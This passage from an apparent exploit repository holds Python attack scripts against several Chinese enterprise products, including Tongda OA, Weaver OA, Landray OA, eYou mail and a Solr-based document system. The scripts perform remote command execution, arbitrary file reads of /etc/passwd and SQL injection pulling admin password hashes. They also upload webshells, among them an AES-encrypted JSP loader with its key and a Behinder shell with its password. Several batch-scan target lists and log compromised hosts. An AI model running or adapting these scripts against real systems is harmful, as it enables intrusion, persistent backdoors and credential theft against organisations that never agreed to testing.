verify=False, timeout=5) 54 | if req.status_code == 200: 55 | print("\033[32m[+] 正在请求{}".format(url)) 56 | else: 57 | pass 58 | except: 59 | pass 60 | 61 | 62 | 63 | try: 64 | request = session.get(url=url, headers=headers, verify=False, timeout=5) 65 | try: 66 | rep = base64.b64decode(json.loads(request.text)['data']['content']) 67 | if "root" in str(rep): 68 | with open('success.txt', 'a', encoding='utf8') as vul: 69 | vul.write(url+'\n') 70 | print("\033[32m[o]"+url+"\n"+"存在任意文件读取漏洞") 71 | else: 72 | pass 73 | except: 74 | pass 75 | except: 76 | pass 77 | 78 | -------------------------------------------------------------------------------- /亿赛通/电子文档安全管理系统_dataimport_远程命令执行漏洞.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import random 4 | import re 5 | import base64 6 | import time 7 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 8 | 9 | def title(): 10 | print('+------------------------------------------') 11 | print('+ \033[34mTitle : 亿赛通 电子文档安全管理系统 dataimport 远程命令执行漏洞 \033[0m') 12 | print('+ \033[36m使用格式: python3 poc.py \033[0m') 13 | print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m') 14 | print('+------------------------------------------') 15 | 16 | def POC_1(target_url): 17 | vuln_url = target_url + "/solr/admin/cores" 18 | headers = { 19 | "Content-Type": "application/x-www-form-urlencoded", 20 | } 21 | try: 22 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 23 | response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5) 24 | print("\033[36m[o] 正在请求 {}/solr/admin/cores.... 
\033[0m".format(target_url)) 25 | if 'responseHeader' in response.text and response.status_code == 200: 26 | result = re.search( 27 | r'<str name="name">([\s\S]*?)</str><str name="instanceDir">', response.text, re.I) 28 | core_name = result.group(1) 29 | print("\033[36m[o] 获取core_name : {} \033[0m".format(core_name)) 30 | POC_2(target_url, core_name) 31 | else: 32 | print("\033[31m[x] 请求失败 \033[0m") 33 | sys.exit(0) 34 | 35 | except Exception as e: 36 | print("\033[31m[x] 请求失败 \033[0m", e) 37 | 38 | def POC_2(target_url, core_name): 39 | cmd = "whoami" 40 | vuln_url = target_url + "/solr/{}/dataimport?command=full-import&verbose=false&clean=false&commit=false&debug=true&core=tika&name=dataimport&dataConfig=%0A%3CdataConfig%3E%0A%3CdataSource%20name%3D%22streamsrc%22%20type%3D%22ContentStreamDataSource%22%20loggerLevel%3D%22TRACE%22%20%2F%3E%0A%0A%20%20%3Cscript%3E%3C!%5BCDATA%5B%0A%20%20%20%20%20%20%20%20%20%20function%20poc(row)%7B%0A%20var%20bufReader%20%3D%20new%20java.io.BufferedReader(new%20java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(%22{}%22).getInputStream()))%3B%0A%0Avar%20result%20%3D%20%5B%5D%3B%0A%0Awhile(true)%20%7B%0Avar%20oneline%20%3D%20bufReader.readLine()%3B%0Aresult.push(%20oneline%20)%3B%0Aif(!oneline)%20break%3B%0A%7D%0A%0Arow.put(%22title%22%2Cresult.join(%22%5Cn%5Cr%22))%3B%0Areturn%20row%3B%0A%0A%7D%0A%0A%5D%5D%3E%3C%2Fscript%3E%0A%0A%3Cdocument%3E%0A%20%20%20%20%3Centity%0A%20%20%20%20%20%20%20%20stream%3D%22true%22%0A%20%20%20%20%20%20%20%20name%3D%22entity1%22%0A%20%20%20%20%20%20%20%20datasource%3D%22streamsrc1%22%0A%20%20%20%20%20%20%20%20processor%3D%22XPathEntityProcessor%22%0A%20%20%20%20%20%20%20%20rootEntity%3D%22true%22%0A%20%20%20%20%20%20%20%20forEach%3D%22%2FRDF%2Fitem%22%0A%20%20%20%20%20%20%20%20transformer%3D%22script%3Apoc%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cfield%20column%3D%22title%22%20xpath%3D%22%2FRDF%2Fitem%2Ftitle%22%20%2F%3E%0A%20%20%20%20%3C%2Fentity%3E%0A%3C%2Fdocument%3E%0A%3C%2Fdata
Config%3E%0A%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20".format(core_name, cmd) 41 | files = { 42 | 'stream.body': '''<?xml version="1.0" encoding="UTF-8"?> 43 | <RDF> 44 | <item/> 45 | </RDF>''' 46 | } 47 | try: 48 | print("\033[36m[o] 正在执行 whoami ... \033[0m".format(target_url)) 49 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 50 | response = requests.post(url=vuln_url, files=files, verify=False, timeout=5) 51 | cmd_response = re.search( 52 | r'documents"><lst><arr name="title"><str>([\s\S]*?)</str></arr></lst>', response.text, re.I) 53 | cmd_response = cmd_response.group(1) 54 | if response.status_code == 200 and cmd_response: 55 | print("\033[36m[o] 命令响应为:\n{} \033[0m".format(cmd_response)) 56 | 57 | except Exception as e: 58 | print("\033[31m[x] 请求失败 \033[0m") 59 | 60 | 61 | 62 | if __name__ == '__main__': 63 | title() 64 | target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m")) 65 | POC_1(target_url) 66 | -------------------------------------------------------------------------------- /tongdaOA/通达OA命令执行漏洞/tongda_rce.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- encoding: utf-8 -*- 3 | ''' 4 | @File : tongda_rce.py 5 | @Time : 2020/03/18 11:59:48 6 | @Author : fuhei 7 | @Version : 1.0 8 | @Blog : http://www.lovei.org 9 | ''' 10 | 11 | import requests 12 | import re 13 | import sys 14 | 15 | 16 | def check(url): 17 | 18 | try: 19 | url1 = url + '/ispirit/im/upload.php' 20 | headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "X-Forwarded-For": "127.0.0.1", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Content-Type": "multipart/form-data; 
boundary=---------------------------27723940316706158781839860668"} 21 | data = "-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"ATTACHMENT\"; filename=\"f.jpg\"\r\nContent-Type: image/jpeg\r\n\r\n<?php\r\n$command=$_POST['f'];\r\n$wsh = new COM('WScript.shell');\r\n$exec = $wsh->exec(\"cmd /c \".$command);\r\n$stdout = $exec->StdOut();\r\n$stroutput = $stdout->ReadAll();\r\necho $stroutput;\r\n?>\n\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"P\"\r\n\r\n1\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"DEST_UID\"\r\n\r\n1222222\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"UPLOAD_MODE\"\r\n\r\n1\r\n-----------------------------27723940316706158781839860668--\r\n" 22 | result = requests.post(url1, headers=headers, data=data) 23 | 24 | name = "".join(re.findall("2003_(.+?)\|",result.text)) 25 | url2 = url + '/ispirit/interface/gateway.php' 26 | headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "X-Forwarded-For": "127.0.0.1", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Content-Type": "application/x-www-form-urlencoded"} 27 | data = {"json": "{\"url\":\"../../../general/../attach/im/2003/%s.f.jpg\"}" % (name), "f": "echo fffhhh"} 28 | result = requests.post(url2, headers=headers, data=data) 29 | if result.status_code == 200 and 'fffhhh' in result.text: 30 | # print("[+] Remote code execution vulnerability exists at the target address") 31 | return name 32 | else: 33 | return False 34 | except: 35 | pass 36 | 37 | def command(url, name,command="whoami"): 38 | url = url + 
'/ispirit/interface/gateway.php' 39 | headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "X-Forwarded-For": "127.0.0.1", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Content-Type": "application/x-www-form-urlencoded"} 40 | data = {"json": "{\"url\":\"../../../general/../attach/im/2003/%s.f.jpg\"}" % (name), "f": "%s" % command} 41 | result = requests.post(url, headers=headers, data=data) 42 | while(1): 43 | command = input("fuhei@shell$ ") 44 | if command == 'exit' or command == 'quit': 45 | break 46 | else: 47 | data = {"json": "{\"url\":\"../../../general/../attach/im/2003/%s.f.jpg\"}" % (name), "f": "%s" % command} 48 | result = requests.post(url, headers=headers, data=data) 49 | print(result.text) 50 | 51 | if __name__ == '__main__': 52 | url = sys.argv[1] 53 | name = check(url) 54 | if name: 55 | print("[+] Remote code execution vulnerability exists at the target address") 56 | command(url,name) 57 | else: 58 | print("[-] There is no remote code execution vulnerability in the target address") 59 | 60 | 61 | -------------------------------------------------------------------------------- /蓝凌OA/蓝凌OA_custom.jsp 任意文件读取漏洞/poc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | #-*- coding:utf-8 -*- 3 | 4 | import base64 5 | import requests 6 | import random 7 | import re 8 | import json 9 | import sys 10 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 11 | 12 | def title(): 13 | print('+------------------------------------------') 14 | print('+ \033[34mVersion: 蓝凌OA 任意文件读取漏洞 \033[0m') 15 | print('+ \033[36m使用格式: python3 poc.py \033[0m') 16 | print('+ \033[36m文件名: url.txt \033[0m') 17 | 
print('+------------------------------------------') 18 | 19 | def get_ua(): 20 | first_num = random.randint(55, 62) 21 | third_num = random.randint(0, 3200) 22 | fourth_num = random.randint(0, 140) 23 | os_type = [ 24 | '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', 25 | '(Macintosh; Intel Mac OS X 10_12_6)' 26 | ] 27 | chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num) 28 | 29 | ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36', 30 | '(KHTML, like Gecko)', chrome_version, 'Safari/537.36'] 31 | ) 32 | return ua 33 | 34 | 35 | def POC_1(target_url): 36 | vuln_url = target_url + "/sys/ui/extend/varkind/custom.jsp" 37 | headers = { 38 | "User-Agent": get_ua(), 39 | "Content-Type": "application/x-www-form-urlencoded" 40 | } 41 | data = 'var={"body":{"file":"file:///etc/passwd"}}' 42 | try: 43 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 44 | response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=10) 45 | print("\033[36m[+] 正在请求 {}/sys/ui/extend/varkind/custom.jsp \033[0m".format(target_url)) 46 | if "root:" in response.text and response.status_code == 200: 47 | with open('success.txt', 'a', encoding='utf8') as vul: 48 | vul.write("{}\n".format(target_url)) 49 | print("\033[36m[+] 成功读取 /etc/passwd文件\n\033[0m") 50 | except Exception as e: 51 | print("\033[31m[x] 请求失败: {} \033[0m".format(e)) 52 | 53 | def Scan(file_name): 54 | header={"User-Agent": get_ua(),} 55 | with open(file_name, "r", encoding='utf8') as scan_url: 56 | for url in scan_url: 57 | if url[:4] != "http": 58 | url = "http://" + url 59 | url = url.strip('\n') 60 | try: 61 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 62 | httpError = False 63 | try: 64 | req = requests.get(url=url, headers=header, verify=False, timeout=10) 65 | except Exception as e: 66 | httpError = True 67 | if not httpError and req.status_code == 200: 68 | print("\033[32m[+] 正在请求 {}".format(url)) 
69 | else: 70 | url = url.replace("http","https") 71 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 72 | req = requests.get(url=url, headers=header, verify=False, timeout=10) 73 | if req.status_code == 200: 74 | print("\033[32m[+] 正在请求 {}".format(url)) 75 | else: 76 | pass 77 | except Exception as e: 78 | print("\033[31m[x] "+url+" 访问失败 \033[0m".format(e)) 79 | else: 80 | pass 81 | try: 82 | POC_1(url) 83 | 84 | except Exception as e: 85 | print("\033[31m[x] "+url+"请求报错 \033[0m".format(e)) 86 | continue 87 | 88 | 89 | if __name__ == '__main__': 90 | title() 91 | file_name = str(input("\033[35m请输入需要检测的文件名:\033[0m")) 92 | Scan(file_name) 93 | 94 | -------------------------------------------------------------------------------- /和信创天云桌面系统/poc.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import random 4 | import base64 5 | import re 6 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 7 | 8 | def title(): 9 | print('+------------------------------------------') 10 | print('+ \033[34mVersion: 和信云桌面任意文件上传漏洞 \033[0m') 11 | print('+ \033[36m使用格式: python3 poc.py \033[0m') 12 | print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m') 13 | print('+ \033[36mFile >>> url.txt \033[0m') 14 | print('+------------------------------------------') 15 | 16 | headers = { 17 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)", 18 | "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv" 19 | } 20 | 21 | def POC_1(target_url): 22 | vuln_url = target_url + "/Upload/upload_file.php?l=test" 23 | data = base64.b64decode("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") 24 | try: 25 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 26 | response = requests.post(url=vuln_url, headers=headers, data=data, verify=False, timeout=5) 27 | if "Requst" in response.text and 
response.status_code == 200: 28 | webshell_url = target_url + "/Upload/test/config.php" 29 | response = requests.get(url=webshell_url, headers=headers,verify=False, timeout=5) 30 | if "shell" in response.text and response.status_code == 200: 31 | with open('webshell.txt', 'a', encoding='utf8') as vu: 32 | vu.write("目标 {} 被上传木马: {}/Upload/test/config.php\n".format(target_url, target_url)) 33 | print("\033[32m[o] 目标 {}存在漏洞 ,成功上传冰蝎木马 config.php\n[o] 路径为 {}/Upload/test/config.php\033[0m".format(target_url, target_url)) 34 | print("\033[32m[o] 密码为: rebeyond \033[0m") 35 | else: 36 | print("\033[31m[x]"+ target_url+"请求失败 \033[0m") 37 | else: 38 | pass 39 | except Exception as e: 40 | pass 41 | 42 | 43 | def Scan(file_name): 44 | with open(file_name, "r", encoding='utf8') as scan_url: 45 | for url in scan_url: 46 | if url[:4] != "http": 47 | url = "http://" + url 48 | url = url.strip('\n') 49 | try: 50 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 51 | req = requests.get(url=url, headers=headers, verify=False, timeout=5) 52 | if req.status_code == 200: 53 | print("\033[32m[o] 正在请求{}".format(url)) 54 | else: 55 | url = url.replace("http","https") 56 | req = requests.get(url=url, headers=headers, verify=False, timeout=5) 57 | if req.status_code == 200: 58 | print("\033[32m[o] 正在请求{}".format(url)) 59 | else: 60 | pass 61 | except Exception as e: 62 | print("\033[31m[x] "+url+"访问失败 \033[0m".format(e)) 63 | try: 64 | POC_1(url) 65 | 66 | except Exception as e: 67 | print("\033[31m[x] "+url+"请求报错 \033[0m".format(e)) 68 | continue 69 | 70 | if __name__ == '__main__': 71 | title() 72 | file_name = str(input("\033[35mPlease input Attack File\nFile >>> \033[0m")) 73 | Scan(file_name) 74 | -------------------------------------------------------------------------------- /泛微OA/泛微OA_V9_任意文件上传/泛微OA_sql+upload.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import urllib3 3 | import time 4 | import 
argparse 5 | 6 | parser = argparse.ArgumentParser(description="请输入目标地址") 7 | parser.add_argument('-u',type=str,help='请输入url',dest='url',default='') 8 | parser.add_argument('-f',type=str,help='请插入字典',dest='file',default='') 9 | args = parser.parse_args() 10 | Get_url = args.url 11 | Get_file = args.file 12 | 13 | def title(): 14 | print("*"*50) 15 | print("*"*4+" "*12+"泛微OA v9 前台文件上传"+" "*8+"*"*4) 16 | print("*"*4+" "*12+"泛微OA v8 前台sql注入"+" "*9+"*"*4) 17 | print("*"*4+" "*33+"By 瓜皮辰"+"*"*4) 18 | print("*"*4+" "*2+"单目标示例:python FanWpoc.py -u url"+" "*4+"*"*4) 19 | print("*"*4+" "*2+"多目标示例:python FanWpoc.py -f *.txt"+" "*2+"*"*4) 20 | print("*"*50) 21 | 22 | def poc1(get_url): 23 | test_url1 = get_url + "/page/exportImport/uploadOperation.jsp" 24 | sql_url = get_url + "/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager" 25 | header = { 26 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36" 27 | } 28 | try: 29 | urllib3.disable_warnings() 30 | res_test = requests.get(url=test_url1,headers=header,verify=False,timeout=5) 31 | if res_test.status_code == 200: 32 | print(get_url+" "+"目标文件上传页面存在,正在测试文件上传,请等待") 33 | time.sleep(1) 34 | poc2(get_url) 35 | else: 36 | print(get_url+" "+"目标文件上传页面不存在,更换地址。") 37 | res_sql = requests.get(url=sql_url,headers=header,verify=False,timeout=5) 38 | if res_sql.status_code == 200 and '</html>' not in res_sql.text: 39 | md5pass = str.strip(res_sql.text) 40 | print("目标存在sql注入漏洞") 41 | vuln_sql = get_url+" 用户名:sysadmin md5密码:"+md5pass 42 | print(vuln_sql) 43 | print("--------------------------") 44 | with open('sql.txt','a+',encoding="utf-8") as s: 45 | s.write(vuln_sql+'\n') 46 | else: 47 | print(get_url+" "+"目标不存在sql注入漏洞") 48 | 49 | except Exception as e: 50 | print(get_url+" "+"目标请求失败!",e) 51 | 52 | def poc2(get_url): 53 | test_url2 = get_url + "/page/exportImport/uploadOperation.jsp" 54 | header = { 55 | 
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36", 56 | "Connection": "close", 57 | "Content-Length": "500" 58 | } 59 | files = { 60 | 'file': ('guapi.jsp',"<%out.print(666);%>",'application/octet-stream') 61 | } 62 | try: 63 | res_1 = requests.post(url=test_url2,headers=header,files=files,verify=False,timeout=5) 64 | poc3(get_url) 65 | except Exception as c: 66 | print("文件上传出错!",c) 67 | 68 | def poc3(get_url): 69 | test_url3 = get_url + '/page/exportImport/fileTransfer/guapi.jsp' 70 | header = { 71 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36", 72 | "Connection": "close", 73 | "Content-Length": "500" 74 | } 75 | res_2 = requests.get(url=test_url3, headers=header, verify=False, timeout=5) 76 | if '666' in res_2.text and res_2.status_code == 200: 77 | print("文件上传成功!!!!!") 78 | vuln_file = get_url+'/page/exportImport/fileTransfer/guapi.jsp' 79 | print("请访问地址:"+vuln_file) 80 | with open('file.txt','a+',encoding='utf-8') as file: 81 | file.write(vuln_file+'\n') 82 | else: 83 | print("上传失败,目标不存在文件上传漏洞") 84 | print("--------------------------") 85 | 86 | def poc4(): 87 | with open(args.file,'r+',encoding='utf-8') as f: 88 | for i in f.readlines(): 89 | s = i.strip() 90 | if 'http://' in s: 91 | poc1(s) 92 | else: 93 | exp1 = 'http://'+s 94 | poc1(exp1) 95 | f.close() 96 | if __name__ == '__main__': 97 | title() 98 | try: 99 | if Get_url != '' and Get_file == '': 100 | if 'http://' in Get_url: 101 | poc1(Get_url) 102 | else: 103 | exp2 = 'http://'+Get_url 104 | poc1(exp2) 105 | elif Get_url == '' and Get_file != '': 106 | poc4() 107 | except KeyboardInterrupt: 108 | print("结束进程。。。。") 109 | pass 110 | -------------------------------------------------------------------------------- /泛微OA/泛微OA_V9_任意文件上传/poc.py: -------------------------------------------------------------------------------- 1 | import requests 
2 | import sys 3 | import random 4 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 5 | 6 | def title(): 7 | print('+------------------------------------------') 8 | print('+ \033[34mVersion: 泛微OA V9 任意文件上传 \033[0m') 9 | print('+ \033[36m使用格式: python3 poc.py \033[0m') 10 | print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m') 11 | print('+ \033[36mFile >>> url.txt \033[0m') 12 | print('+------------------------------------------') 13 | 14 | #随机ua 15 | def get_ua(): 16 | first_num = random.randint(55, 62) 17 | third_num = random.randint(0, 3200) 18 | fourth_num = random.randint(0, 140) 19 | os_type = [ 20 | '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', 21 | '(Macintosh; Intel Mac OS X 10_12_6)' 22 | ] 23 | chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num) 24 | 25 | ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36', 26 | '(KHTML, like Gecko)', chrome_version, 'Safari/537.36'] 27 | ) 28 | return ua 29 | 30 | 31 | 32 | def POC_1(target_url): 33 | vuln_url_1 = target_url + "/page/exportImport/uploadOperation.jsp" 34 | print('\033[36m[+] 正在请求: {}'.format(vuln_url_1)) 35 | headers = { 36 | "User-Agent": get_ua(), 37 | "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary6XgyjB6SeCArD3Hc", 38 | "Connection": "close", 39 | "Content-Length": "500" 40 | } 41 | files = { 42 | 'file': ('update.jsp','<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%><%out.print(666);%>','application/octet-stream') 43 
| } 44 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 45 | response = requests.post(url=vuln_url_1, headers=headers, timeout=5, files=files, verify=False) 46 | webshell_url = target_url + "/page/exportImport/fileTransfer/update.jsp" 47 | try: 48 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 49 | response = requests.get(url=webshell_url, timeout=5, verify=False, headers=headers) 50 | if '666' in response.text and response.status_code == 200: 51 | with open('webshell.txt', 'a', encoding='utf8') as vu: 52 | vu.write("目标 {} 被上传木马: {}/page/exportImport/fileTransfer/update.jsp\n".format(target_url, target_url)) 53 | print("\033[32m[+] 目标 {} 被上传木马: {}/page/exportImport/fileTransfer/update.jsp \033[0m".format(target_url, target_url)) 54 | except Exception as e: 55 | print("\033[31m[x] "+url+" 请求报错 \033[0m".format(e)) 56 | 57 | def Scan(file_name): 58 | header={"User-Agent": get_ua(),} 59 | with open(file_name, "r", encoding='utf8') as scan_url: 60 | for url in scan_url: 61 | if url[:4] != "http": 62 | url = "http://" + url 63 | url = url.strip('\n') 64 | try: 65 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 66 | httpError = False 67 | try: 68 | req = requests.get(url=url, headers=header, verify=False, timeout=5) 69 | except Exception as e: 70 | httpError = True 71 | if not httpError and req.status_code == 200: 72 | print("\033[32m[+] 正在请求{}".format(url)) 73 | else: 74 | url = url.replace("http","https") 75 | req = requests.get(url=url, headers=header, verify=False, timeout=5) 76 | if req.status_code == 200: 77 | print("\033[32m[+] 正在请求{}".format(url)) 78 | else: 79 | pass 80 | except Exception as e: 81 | print("\033[31m[x] "+url+" 访问失败 \033[0m".format(e)) 82 | try: 83 | POC_1(url) 84 | 85 | except Exception as e: 86 | print("\033[31m[x] "+url+" 请求报错 \033[0m".format(e)) 87 | continue 88 | if __name__ == '__main__': 89 | title() 90 | file_name = str(input("\033[35m请输入需要检测的文件名:\033[0m")) 91 | Scan(file_name) 
92 | -------------------------------------------------------------------------------- /EYouMail/EYouMailRCE.py: -------------------------------------------------------------------------------- 1 | import re 2 | import requests,sys,random,re,json,click,base64 3 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 4 | 5 | def info(): 6 | print("[+]============================================================") 7 | print("[+] 亿邮电子邮件系统远程命令执行漏洞") 8 | print("[+] Explain: wendengyun") 9 | print("[+]============================================================") 10 | print(" ") 11 | 12 | #随机ua 13 | def get_ua(): 14 | first_num = random.randint(55, 62) 15 | third_num = random.randint(0, 3200) 16 | fourth_num = random.randint(0, 140) 17 | os_type = [ 18 | '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', 19 | '(Macintosh; Intel Mac OS X 10_12_6)' 20 | ] 21 | chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num) 22 | 23 | ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36', 24 | '(KHTML, like Gecko)', chrome_version, 'Safari/537.36'] 25 | ) 26 | return ua 27 | 28 | 29 | # 漏洞利用poc 30 | def exp1(url): 31 | target_url = url + "/webadm/?q=moni_detail.do&action=gragh" 32 | headers = { 33 | "User-Agent": get_ua(), 34 | "Content-Type": "application/x-www-form-urlencoded;charset=UTF-8", 35 | "Accept-Encoding": "gzip, deflate", 36 | "Accept-Language": "zh-CN,zh;q=0.9", 37 | "Connection": "close", 38 | } 39 | data = "type='|whoami||'" 40 | try: 41 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 42 | response = requests.post(url=target_url, data=data, headers=headers, verify=False, timeout=10) 43 | if response.status_code == 200: 44 | dr = re.compile(r'<[^>]+>',re.S) 45 | dd = dr.sub('',response.text) 46 | dd = dd.strip('\n') 47 | print("\033[32m[+] 目标 {}存在漏洞,响应为:\n{}\033[0m".format(url,dd)) 48 | with open('success.txt', 'a', encoding='utf8') as vul: 49 | vul.write(url+'\n') 50 | else: 51 | 
print("\033[31m[x] 目标 {}不存在漏洞 \033[0m".format(url)) 52 | except Exception as e: 53 | print("\033[31m[x] 目标 {} 请求失败 \033[0m".format(url)) 54 | 55 | # 对单个url进行验证 56 | def scan1(url): 57 | exp1(str(url)) 58 | 59 | 60 | # 批量漏洞验证 61 | def scan2(file): 62 | with open(file, "r", encoding='utf8') as scan_url: 63 | for url in scan_url: 64 | if url[:4] != "http": 65 | url = "http://" + url 66 | url = url.strip('\n') 67 | try: 68 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 69 | req = requests.get(url=url, verify=False, timeout=10) 70 | if req.status_code == 200: 71 | print("\033[32m[+] 正在请求{}".format(url)) 72 | exp1(url) 73 | except: 74 | pass 75 | try: 76 | url = url.replace("http","https") 77 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 78 | req = requests.get(url=url, verify=False, timeout=10) 79 | if req.status_code == 200: 80 | print("\033[32m[+] 正在请求{}".format(url)) 81 | exp1(url) 82 | except: 83 | pass 84 | # 命令执行 85 | def command(url, cmd): 86 | target_url = url + "/webadm/?q=moni_detail.do&action=gragh" 87 | headers = { 88 | "User-Agent": get_ua(), 89 | "Content-Type": "application/x-www-form-urlencoded;charset=UTF-8", 90 | "Accept-Encoding": "gzip, deflate", 91 | "Accept-Language": "zh-CN,zh;q=0.9", 92 | } 93 | data = "type='|"+cmd+"||'" 94 | try: 95 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 96 | response = requests.post(url=target_url, data=data, headers=headers, verify=False, timeout=10) 97 | if response.status_code == 200: 98 | dr = re.compile(r'<[^>]+>',re.S) 99 | dd = dr.sub('',response.text) 100 | dd = dd.strip('\n') 101 | print("\033[32m[+] 目标 {}存在漏洞,响应为:\n{}\033[0m".format(url,dd)) 102 | else: 103 | print("\033[31m[x]目标 {}不存在漏洞 \033[0m".format(url)) 104 | except Exception as e: 105 | print("\033[31m[x]目标 {} 请求失败 \033[0m".format(url)) 106 | 107 | 108 | @click.command() 109 | @click.option("-u", "--url", help='Target URL,对单一目标检测; Example:python3 EYouMailRCE.py -u https://ip:port') 110 
| @click.option("-f", "--file", help="Target File,对批量目标检测; Example:python3 EYouMailRCE.py -f ip.txt") 111 | @click.option("-c", "--cmd", help="Target command,命令执行; Example: python3 EYouMailRCE.py -cmd id") 112 | def main(url,file,cmd): 113 | info() 114 | if url != None and file == None and cmd ==None: 115 | scan1(url) 116 | elif url == None and file != None and cmd ==None: 117 | scan2(file) 118 | elif url != None and file == None and cmd !=None: 119 | command(url, cmd) 120 | else: 121 | print("python3 EYouMailRCE.py --help") 122 | 123 | if __name__ == '__main__': 124 | main() 125 | -------------------------------------------------------------------------------- /泛微OA/ecology_test/ecology_test.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import urllib3 4 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 5 | 6 | print ''' 7 | ------------------------------------ 8 | Ecology test script by LuckyEast >_< 9 | ------------------------------------ 10 | 11 | plz wait... 
